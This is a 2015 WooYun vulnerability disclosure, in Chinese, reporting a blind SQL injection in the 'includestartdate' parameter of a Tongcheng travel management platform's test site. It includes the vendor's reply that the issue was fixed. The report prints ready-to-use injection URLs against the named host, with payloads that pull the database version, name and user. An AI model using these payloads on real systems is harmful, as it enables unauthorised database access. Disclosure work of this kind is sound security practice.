漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-09: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
苏州同程某管理平台存在boolean-based blind注入漏洞(附手工检测)
详细说明:
http://test1.www.51zfx.net/newadmin/Distributor/Login.aspx 苏州同程旅游管理平台V8.1
注入参数:includestartdate
注入点:
/Reception.aspx?days=&days2=&fee2=&includestartdate=pUaHwnCN
/ReceptionDJ.aspx?days=&days2=&fee2=&includestartdate=mYLmDd5I
手工测试:(可以获取当前数据库名,用户,版本)
http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=2015-04-08'+and+1=@@version--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=
http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=1%27+and+1=db_name%28%29--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=%22
http://test1.www.51zfx.net/Reception.aspx?title=&includestartdate=1%27+and+1=user--&type=&linegroup=&days=&title2=&linetype2=&linegroup2=&days2=&fee2=%22
漏洞证明:
已经证明
修复方案:
过滤参数
版权声明:转载请注明来源 Mr.leo@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-04-09 10:01
厂商回复:
感谢关注同程旅游,内部报过了,唉...
最新状态:
2015-04-09:已修复,测试站点未走软WAF,已下线。随手找了一个走软WAF的贴在评论里了,欢迎测试。